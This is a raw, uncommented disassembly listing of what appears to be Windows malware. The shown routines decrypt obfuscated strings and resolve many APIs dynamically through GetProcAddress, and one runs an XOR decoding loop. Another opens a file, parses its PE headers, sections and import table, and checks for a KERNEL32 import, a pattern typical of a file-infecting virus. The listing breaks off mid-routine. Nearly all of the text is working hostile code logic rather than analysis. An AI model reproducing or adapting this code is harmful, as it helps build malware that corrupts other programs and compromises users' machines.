loc_441F45: ; CODE XREF: sub_441E11+305�j
push offset dword_44BA40
call sub_43DF30
push eax
lea edi, [ebp+var_110B]
push edi
call sub_444C90
lea eax, [ebp+ebx+var_FFF]
push eax
lea eax, [ebp+var_110B]
push eax
call ds:dword_445020
add esp, 0Ch
call ds:dword_44ABAC
mov ecx, 14h
cdq
idiv ecx
mov [ebp+var_100C], edx
mov eax, dword_44B0AC
cmp edx, eax
jnb loc_44206D
push [ebp+var_1008]
lea eax, [ebp+var_120A]
push eax
call sub_442143
mov eax, dword_44B094
movsx edx, word_44B118
add eax, edx
sub eax, 8
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_43F8DA
add esp, 14h
movsx edi, word_44B090
add edi, 0FFFDh
cmp eax, edi
jnz short loc_442003
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call ds:dword_445020
push offset byte_44BA3B
call sub_43DF30
push eax
push [ebp+arg_0]
call ds:dword_445020
add esp, 14h
loc_442003: ; CODE XREF: sub_441E11+1C9�j
mov eax, dword_44B138
dec eax
push eax
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call sub_43F8DA
add esp, 0Ch
mov edi, dword_44B144
add edi, 0FFFFh
cmp eax, edi
jnz short loc_442067
push offset dword_44BA30
call sub_43DF30
push eax
push [ebp+arg_0]
call ds:dword_445020
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call ds:dword_445020
push offset byte_44BA2B
call sub_43DF30
push eax
push [ebp+arg_0]
call ds:dword_445020
add esp, 20h
loc_442067: ; CODE XREF: sub_441E11+219�j
inc [ebp+var_1008]
loc_44206D: ; CODE XREF: sub_441E11+17E�j
push [ebp+var_1004]
call sub_43E0F8
pop ecx
mov [ebp+var_100C], eax
mov ecx, dword_44B148
cmp eax, ecx
jnb short loc_4420DD
movsx eax, word_44B12C
sub eax, 3
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_43F8DA
add esp, 0Ch
mov edi, dword_44B0DC
add edi, 0FFF7h
cmp eax, edi
jnz short loc_4420DD
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call ds:dword_445020
push offset word_44BA26
call sub_43DF30
push eax
push [ebp+arg_0]
call ds:dword_445020
add esp, 14h
loc_4420DD: ; CODE XREF: sub_441E11+276�j
; sub_441E11+2A3�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_4420E7: ; CODE XREF: sub_441E11+2DB�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4420E7
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
movsx edx, word_44B0E0
movsx ecx, word_44B11C
add edx, ecx
sub edx, 0Ah
cmp eax, edx
jnz loc_441F45
push offset byte_44BA21
call sub_43DF30
push eax
push [ebp+arg_0]
call ds:dword_445020
add esp, 0Ch
mov eax, [ebp+var_1008]
mov dword_44B210, eax
loc_44213E: ; CODE XREF: sub_441E11+A7�j
; sub_441E11+E2�j
pop edi
pop esi
pop ebx
leave
retn
sub_441E11 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442143 proc near ; CODE XREF: sub_43BAE4+38C�p
; sub_43D966+217�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
inc esi
mov edi, dword_44B100
add edi, 1Ch
mov eax, esi
test eax, eax
jge short loc_442164
add eax, 0FFh
loc_442164: ; CODE XREF: sub_442143+1A�j
sar eax, 8
movsx ebx, word_44B140
add ebx, 2
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_8], edi
mov edi, dword_44B144
add edi, 15h
mov eax, esi
test eax, eax
jge short loc_44218F
add eax, 0FFh
loc_44218F: ; CODE XREF: sub_442143+45�j
sar eax, 8
mov ebx, dword_44B100
add ebx, 0Eh
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_C], edi
mov edi, dword_44B0C4
add edi, 1Dh
mov eax, esi
test eax, eax
jge short loc_4421B9
add eax, 0FFFFh
loc_4421B9: ; CODE XREF: sub_442143+6F�j
sar eax, 10h
movsx ebx, word_44B0F0
add ebx, 12h
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_10], edi
mov eax, esi
mul [ebp+var_8]
mov [ebp+var_1C], eax
and eax, 0FFh
push eax
call sub_43B486
mov ebx, eax
mov [ebp+var_1], bl
mov eax, dword_44B0D4
add eax, 0Ch
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_4409B5
mov ebx, eax
mov [ebp+var_11], bl
mov eax, esi
mul [ebp+var_C]
mov [ebp+var_20], eax
and eax, 0FFh
push eax
call sub_43B486
mov ebx, eax
mov [ebp+var_12], bl
movsx eax, word_44B118
add eax, 68h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_4409B5
mov ebx, eax
mov [ebp+var_13], bl
mov eax, esi
and eax, 0FFh
push eax
call sub_43B486
mov ebx, eax
mov [ebp+var_14], bl
movsx eax, word_44B140
add eax, 28h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_4409B5
mov ebx, eax
mov [ebp+var_15], bl
mov eax, esi
mul [ebp+var_10]
mov [ebp+var_24], eax
and eax, 0FFh
push eax
call sub_43B486
mov ebx, eax
mov [ebp+var_16], bl
mov eax, dword_44B0D0
add eax, 49h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_4409B5
mov ebx, eax
mov [ebp+var_17], bl
mov eax, dword_44B148
lea eax, [eax+eax+3Fh]
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_43B486
add esp, 24h
mov ebx, eax
mov [ebp+var_18], bl
movzx edi, [ebp+var_1]
mov eax, edi
shr eax, 1
mul dword_44B0AC
mov [ebp+var_28], eax
mov esi, eax
cmp esi, edi
jnz short loc_44232A
push offset byte_44BA07
call sub_43DF30
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call ds:dword_44A634
add esp, 30h
jmp short loc_44236E
; ---------------------------------------------------------------------------
loc_44232A: ; CODE XREF: sub_442143+19F�j
push offset dword_44B9EC
call sub_43DF30
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call ds:dword_44A634
add esp, 30h
loc_44236E: ; CODE XREF: sub_442143+1E5�j
pop edi
pop esi
pop ebx
leave
retn
sub_442143 endp
; =============== S U B R O U T I N E =======================================
sub_442373 proc near ; CODE XREF: sub_43FC77+274�p
push edi
push offset word_44B9DE
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A660, eax
push offset word_44B9D6
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44600C, eax
push offset word_44B9C2
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4475E8, eax
push offset word_44B9B2
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448244, eax
push offset byte_44B9A3
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A788, eax
push offset dword_44B994
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445008, eax
push offset word_44B982
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44AB9C, eax
push offset byte_44B975
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44AB8C, eax
push offset word_44B966
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_449650, eax
push offset byte_44B957
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A624, eax
push offset byte_44B94B
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445000, eax
push offset dword_44B940
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4470E0, eax
push offset byte_44B929
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44500C, eax
push offset word_44B912
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A63C, eax
push offset dword_44B8FC
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A608, eax
push offset dword_44B8EC
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445034, eax
push offset dword_44B8E0
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445028, eax
push offset dword_44B8D0
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448248, eax
push offset byte_44B8C1
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_449630, eax
push offset byte_44B8B3
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447A34, eax
push offset word_44B8A6
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447618, eax
push offset byte_44B895
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44825C, eax
push offset dword_44B884
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44502C, eax
push offset dword_44B874
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A770, eax
push offset word_44B862
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448258, eax
push offset byte_44B851
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_446004, eax
push offset dword_44B844
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447608, eax
push offset byte_44B833
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A664, eax
push offset word_44B81E
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A64C, eax
push offset word_44B80E
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_446000, eax
push offset byte_44B7F9
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4470D4, eax
push offset dword_44B7EC
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448364, eax
push offset dword_44B7DC
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A61C, eax
push offset word_44B7CE
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_449644, eax
push offset dword_44B7B8
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_449638, eax
push offset byte_44B7A1
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4475FC, eax
push offset byte_44B789
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447A3C, eax
push offset byte_44B771
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445010, eax
push offset dword_44B758
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A614, eax
push offset byte_44B745
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A780, eax
push offset byte_44B72D
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A778, eax
push offset dword_44B71C
call sub_43DF30
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44AB98, eax
push offset word_44B70A
call sub_43DF30
add esp, 0ACh
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4475F4, eax
pop edi
retn
sub_442373 endp
; =============== S U B R O U T I N E =======================================
sub_442830 proc near ; DATA XREF: .data:0044B26C�o
mov eax, 80004001h
retn 18h
sub_442830 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442838 proc near ; CODE XREF: sub_43A503+21E�p
; sub_43A503+235�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword_44B150, 0
jnz short loc_442860
push offset dword_44ABC0
call ds:dword_446008 ; InitializeCriticalSection
mov dword_44B150, 1
loc_442860: ; CODE XREF: sub_442838+11�j
movsx esi, word_44B0B8
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+2]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
movsx edx, word_44B0F4
mov ecx, dword_44B0D4
lea edx, [edx+ecx+2]
imul ebx, edx
lea esi, [esi+ebx+4]
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
mov edx, dword_44B134
movsx ecx, word_44B0A0
add edx, ecx
sub edx, 3
cmp eax, edx
jz loc_442951
push offset dword_44ABC0
call ds:dword_44A65C ; RtlEnterCriticalSection
movsx eax, word_44B0B4
mov edx, dword_44B0D0
lea eax, [eax+edx+1]
mov [ebp+var_2], ax
jmp short loc_442902
; ---------------------------------------------------------------------------
loc_4428D5: ; CODE XREF: sub_442838+D4�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+4]
xor edx, ecx
mov [eax], dl
movzx eax, [ebp+var_2]
mov edx, dword_44B148
movsx ecx, word_44B114
add edx, ecx
sub edx, 3
add eax, edx
mov [ebp+var_2], ax
loc_442902: ; CODE XREF: sub_442838+9B�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_4428D5
mov eax, dword_44B0A8
sub eax, 4
movsx edx, word_44B0E0
movsx ecx, word_44B0B4
add edx, ecx
sub edx, 0Dh
mov [edi+eax], dl
mov eax, dword_44B134
sub eax, 2
mov edx, dword_44B0B0
add edx, dword_44B09C
sub edx, 8
mov [edi+eax], dl
push offset dword_44ABC0
call ds:dword_44964C ; RtlLeaveCriticalSection
loc_442951: ; CODE XREF: sub_442838+75�j
lea eax, [edi+6]
pop edi
pop esi
pop ebx
leave
retn
sub_442838 endp
; =============== S U B R O U T I N E =======================================
sub_442959 proc near ; DATA XREF: .data:0044B240�o
mov eax, 80004001h
retn 8
sub_442959 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442961 proc near ; CODE XREF: sub_43B725+1C5�p
var_3200C = dword ptr -3200Ch
var_32008 = dword ptr -32008h
var_32003 = byte ptr -32003h
var_32002 = byte ptr -32002h
var_32001 = byte ptr -32001h
var_31FFE = byte ptr -31FFEh
var_31F58 = dword ptr -31F58h
var_31F54 = dword ptr -31F54h
var_31F50 = dword ptr -31F50h
var_31F4C = dword ptr -31F4Ch
var_31F48 = dword ptr -31F48h
var_31F44 = dword ptr -31F44h
var_31F40 = dword ptr -31F40h
var_31F3C = dword ptr -31F3Ch
var_31F38 = dword ptr -31F38h
var_31F34 = dword ptr -31F34h
var_31F30 = dword ptr -31F30h
var_31F2C = dword ptr -31F2Ch
var_31F28 = dword ptr -31F28h
var_31F24 = dword ptr -31F24h
var_31F20 = dword ptr -31F20h
var_31F1C = dword ptr -31F1Ch
var_31F18 = dword ptr -31F18h
var_31F14 = dword ptr -31F14h
var_31F10 = dword ptr -31F10h
var_31F0C = dword ptr -31F0Ch
var_31F08 = dword ptr -31F08h
var_31F04 = dword ptr -31F04h
var_31F00 = dword ptr -31F00h
var_31EFC = dword ptr -31EFCh
var_31EF8 = dword ptr -31EF8h
var_31EF4 = dword ptr -31EF4h
var_31EF0 = dword ptr -31EF0h
var_31EEC = dword ptr -31EECh
var_31EE8 = dword ptr -31EE8h
var_31EE4 = dword ptr -31EE4h
var_31EE0 = dword ptr -31EE0h
var_31EDC = dword ptr -31EDCh
var_31ED8 = dword ptr -31ED8h
var_31ED4 = dword ptr -31ED4h
var_31ED0 = byte ptr -31ED0h
var_31EC3 = byte ptr -31EC3h
var_1190 = dword ptr -1190h
var_118C = dword ptr -118Ch
var_1188 = dword ptr -1188h
var_1184 = dword ptr -1184h
var_1180 = dword ptr -1180h
var_117C = dword ptr -117Ch
var_1178 = dword ptr -1178h
var_1174 = dword ptr -1174h
var_116F = byte ptr -116Fh
var_1070 = dword ptr -1070h
var_106C = dword ptr -106Ch
var_1068 = dword ptr -1068h
var_1064 = dword ptr -1064h
var_1060 = dword ptr -1060h
var_105C = dword ptr -105Ch
var_1058 = dword ptr -1058h
var_1054 = dword ptr -1054h
var_1050 = dword ptr -1050h
var_C54 = dword ptr -0C54h
var_C50 = dword ptr -0C50h
var_C4C = dword ptr -0C4Ch
var_850 = dword ptr -850h
var_84C = dword ptr -84Ch
var_848 = dword ptr -848h
var_844 = dword ptr -844h
var_840 = dword ptr -840h
var_83C = dword ptr -83Ch
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = dword ptr -438h
var_434 = dword ptr -434h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 3200Ch
call sub_444C70
push ebx
push esi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_31EC3]
push eax
call ds:dword_449634
add esp, 0Ch
push 0
mov eax, dword_44B0AC
sub eax, 2
push eax
push 3
push 0
mov eax, dword_44B10C
sub eax, 3
push eax
push 0C0000001h
push [ebp+arg_0]
call ds:dword_44A788 ; CreateFileA
mov [ebp+var_1070], eax
cmp eax, 0FFFFFFFFh
jnz short loc_4429BF
xor eax, eax
jmp loc_443D60
; ---------------------------------------------------------------------------
loc_4429BF: ; CODE XREF: sub_442961+55�j
push 0
push [ebp+var_1070]
call ds:dword_44A624 ; GetFileSize
mov [ebp+var_10], eax
mov edx, [ebp+arg_8]
lea eax, [eax+edx+1FFFFh]
push eax
push 0
call ds:dword_447A34 ; LocalAlloc
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_31ED8]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call ds:dword_445028 ; ReadFile
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
mov [ebp+var_840], eax
mov eax, [ebp+var_31ED8]
sub eax, 0F8h
cmp [ebp+var_840], eax
ja loc_443D49
mov eax, [ebp+var_840]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jnz loc_443D49
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+5Ch]
mov edx, dword_44B100
add edx, dword_44B0F8
sub edx, 9
cmp eax, edx
jz loc_443D49
mov eax, [ebp+var_8]
movzx edx, word ptr [eax+44h]
movsx ecx, word_44B13C
add ecx, dword_44B0F8
dec ecx
cmp edx, ecx
jnz short loc_442A90
mov edx, dword_44B144
add edx, 5
add edx, dword_44B100
mov [eax+1Ah], dl
cmp dl, 0
jnz loc_443D49
loc_442A90: ; CODE XREF: sub_442961+112�j
mov eax, [ebp+var_8]
mov eax, [eax+80h]
mov [ebp+var_430], eax
mov eax, 28h
mov [ebp+var_31EE8], eax
mov edx, [ebp+var_8]
mov [ebp+var_31EF0], edx
mov ecx, [ebp+var_840]
add ecx, 0F8h
mov [ebp+var_31EEC], eax
movzx edi, word ptr [edx+6]
mul edi
mov [ebp+var_31EF4], eax
mov edx, ecx
add edx, eax
mov [ebp+var_31EFC], edx
mov eax, [ebp+var_31EE8]
mov [ebp+var_31EF8], eax
mov ecx, dword_44B124
add ecx, 2
mul ecx
mov [ebp+var_31F00], eax
mov eax, [ebp+var_31EFC]
mov edx, [ebp+var_31F00]
add eax, edx
mov edx, [ebp+var_31EF0]
add eax, [edx+0D4h]
cmp eax, [edx+54h]
ja loc_443D49
mov eax, dword_44B100
add eax, dword_44B0AC
sub eax, 5
mov [ebp+var_20], eax
mov eax, dword_44B09C
sub eax, 3
mov [ebp+var_C54], eax
movsx eax, word_44B12C
movsx edx, word_44B11C
add eax, edx
sub eax, 6
mov [ebp+var_105C], eax
movsx eax, word_44B140
movsx edx, word_44B0B8
add eax, edx
sub eax, 9
mov [ebp+var_434], eax
jmp loc_442C33
; ---------------------------------------------------------------------------
loc_442B71: ; CODE XREF: sub_442961+2DF�j
mov eax, 28h
mul [ebp+var_434]
mov [ebp+var_31F0C], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F0C]
mov esi, edx
add esi, eax
mov eax, [esi+0Ch]
add eax, [esi+8]
mov [ebp+var_31F04], eax
mov eax, [esi+14h]
add eax, [esi+10h]
mov [ebp+var_31F08], eax
mov eax, [ebp+var_20]
cmp [ebp+var_31F04], eax
jbe short loc_442BC8
mov eax, [ebp+var_31F04]
mov [ebp+var_20], eax
loc_442BC8: ; CODE XREF: sub_442961+25C�j
mov eax, [ebp+var_C54]
cmp [ebp+var_31F08], eax
jbe short loc_442BE2
mov eax, [ebp+var_31F08]
mov [ebp+var_C54], eax
loc_442BE2: ; CODE XREF: sub_442961+273�j
mov eax, [ebp+var_8]
mov eax, [eax+0A8h]
cmp eax, [esi+0Ch]
jb short loc_442C0D
cmp eax, [ebp+var_31F04]
jnb short loc_442C0D
mov eax, [esi+14h]
mov edx, [ebp+var_8]
add eax, [edx+0A8h]
sub eax, [esi+0Ch]
mov [ebp+var_105C], eax
loc_442C0D: ; CODE XREF: sub_442961+28D�j
; sub_442961+295�j
mov eax, [ebp+var_430]
mov edx, [esi+0Ch]
cmp eax, edx
jb short loc_442C2D
add edx, [esi+8]
cmp eax, edx
jnb short loc_442C2D
sub eax, [esi+0Ch]
add eax, [esi+14h]
mov [ebp+var_848], eax
loc_442C2D: ; CODE XREF: sub_442961+2B7�j
; sub_442961+2BE�j
inc [ebp+var_434]
loc_442C33: ; CODE XREF: sub_442961+20B�j
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+6]
cmp [ebp+var_434], eax
jb loc_442B71
movsx eax, word_44B114
mov edx, dword_44B144
lea eax, [eax+edx+0FFDh]
push eax
push [ebp+var_20]
call sub_43B43E
add esp, 8
mov [ebp+var_20], eax
mov eax, [ebp+var_C54]
cmp [ebp+var_10], eax
jz short loc_442C93
mov eax, [ebp+var_8]
movsx edx, word_44B0B4
add edx, dword_44B134
sub edx, 9
cmp [eax+0A8h], edx
jz loc_443D49
loc_442C93: ; CODE XREF: sub_442961+311�j
mov eax, dword_44B0F8
sub eax, 7
cmp [ebp+var_105C], eax
jz loc_442D74
movsx eax, word_44B120
sub eax, 8
mov [ebp+var_31F0C], eax
mov eax, dword_44B10C
add eax, dword_44B09C
sub eax, 6
mov [ebp+var_31F04], eax
jmp short loc_442D1B
; ---------------------------------------------------------------------------
loc_442CCD: ; CODE XREF: sub_442961+3E0�j
mov eax, [ebp+var_105C]
mov [ebp+var_31F10], eax
mov eax, 1Ch
mul [ebp+var_31F04]
mov [ebp+var_31F14], eax
mov eax, [ebp+var_31F10]
mov edx, [ebp+var_31F14]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F08], eax
mov edx, [ebp+var_31F0C]
cmp [eax+18h], edx
jbe short loc_442D15
mov eax, [eax+18h]
mov [ebp+var_31F0C], eax
loc_442D15: ; CODE XREF: sub_442961+3A9�j
inc [ebp+var_31F04]
loc_442D1B: ; CODE XREF: sub_442961+36A�j
mov edi, [ebp+var_8]
mov eax, [edi+0ACh]
mov ecx, 1Ch
shr eax, 2
mov edx, 24924925h
mul edx
mov [ebp+var_31F10], edx
mov edi, edx
cmp [ebp+var_31F04], edi
jb short loc_442CCD
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_31F0C]
call sub_43B43E
add esp, 8
mov [ebp+var_31F0C], eax
mov eax, [ebp+var_C54]
cmp eax, [ebp+var_10]
jz short loc_442D74
cmp [ebp+var_31F0C], eax
jnz loc_443D49
loc_442D74: ; CODE XREF: sub_442961+340�j
; sub_442961+405�j
and [ebp+var_1174], 0
mov eax, dword_44B0E8
movsx edx, word_44B114
add eax, edx
sub eax, 9
mov [ebp+var_438], eax
jmp loc_442ED4
; ---------------------------------------------------------------------------
loc_442D97: ; CODE XREF: sub_442961+582�j
mov eax, [ebp+var_848]
add eax, [ebp+var_438]
add eax, [ebp+var_4]
mov [ebp+var_32008], eax
movsx edx, word_44B120
sub edx, 8
cmp [eax], edx
jz loc_442EE9
mov eax, [ebp+var_32008]
mov eax, [eax+0Ch]
sub eax, [ebp+var_430]
add eax, [ebp+var_848]
mov [ebp+var_3200C], eax
add eax, [ebp+var_4]
push eax
lea eax, [ebp+var_32003]
push eax
call ds:dword_4471F4
add esp, 8
mov eax, dword_44B138
add eax, dword_44B0F8
sub eax, 9
mov [ebp+var_31F04], eax
jmp short loc_442E2E
; ---------------------------------------------------------------------------
loc_442E03: ; CODE XREF: sub_442961+4EF�j
mov eax, [ebp+var_31F04]
mov al, [ebp+eax+var_32003]
cmp al, 61h
jle short loc_442E28
cmp al, 7Ah
jge short loc_442E28
mov eax, [ebp+var_31F04]
lea eax, [ebp+eax+var_32003]
sub byte ptr [eax], 20h
loc_442E28: ; CODE XREF: sub_442961+4B1�j
; sub_442961+4B5�j
inc [ebp+var_31F04]
loc_442E2E: ; CODE XREF: sub_442961+4A0�j
mov eax, [ebp+var_31F04]
movsx eax, [ebp+eax+var_32003]
mov edx, dword_44B148
movsx ecx, word_44B14C
add edx, ecx
sub edx, 6
cmp eax, edx
jnz short loc_442E03
mov eax, dword_44B144
movsx edx, word_44B13C
add edx, eax
cmp byte ptr [ebp+edx+var_3200C+2], 4Bh
jnz short loc_442ECD
mov edx, dword_44B0D0
cmp [ebp+edx+var_32002], 45h
jnz short loc_442ECD
mov edx, dword_44B0E8
add edx, eax
cmp byte ptr [ebp+edx+var_32008+1], 52h
jnz short loc_442ECD
movsx eax, word_44B0F4
cmp [ebp+eax+var_31FFE], 4Ch
jnz short loc_442ECD
movsx eax, word_44B140
add eax, dword_44B0D8
cmp byte ptr [ebp+eax+var_32008+1], 33h
jnz short loc_442ECD
mov eax, dword_44B098
cmp [ebp+eax+var_32001], 32h
jnz short loc_442ECD
mov [ebp+var_1174], 1
loc_442ECD: ; CODE XREF: sub_442961+507�j
; sub_442961+517�j ...
add [ebp+var_438], 14h
loc_442ED4: ; CODE XREF: sub_442961+431�j
mov eax, [ebp+var_8]
mov eax, [eax+84h]
cmp [ebp+var_438], eax
jb loc_442D97
loc_442EE9: ; CODE XREF: sub_442961+457�j
cmp [ebp+var_1174], 0
jz loc_443D49
lea eax, [ebp+var_31EC3]
mov [ebp+var_42C], eax
mov ecx, [eax+3Ch]
mov [ebp+var_84C], ecx
add ecx, eax
mov [ebp+var_844], ecx
mov eax, [ebp+var_8]
mov [ebp+var_31F04], eax
mov edx, dword_44B100
sub edx, 3
cmp [eax+0D0h], edx
jz loc_44309D
mov edx, [eax+0D4h]
mov [ebp+var_31F08], edx
movsx ecx, word_44B0F4
cmp edx, ecx
jz loc_44309D
mov ecx, 28h
mov edi, [ebp+var_840]
add edi, 0F8h
mov eax, ecx
mov edx, [ebp+var_31F04]
movzx edx, word ptr [edx+6]
mov [ebp+var_31F0C], edx
mul edx
mov [ebp+var_31F10], eax
mov edx, edi
add edx, eax
mov [ebp+var_31F18], edx
mov eax, ecx
mov [ebp+var_31F14], eax
mov ecx, dword_44B104
add ecx, 2
mul ecx
mov [ebp+var_31F1C], eax
mov eax, [ebp+var_31F18]
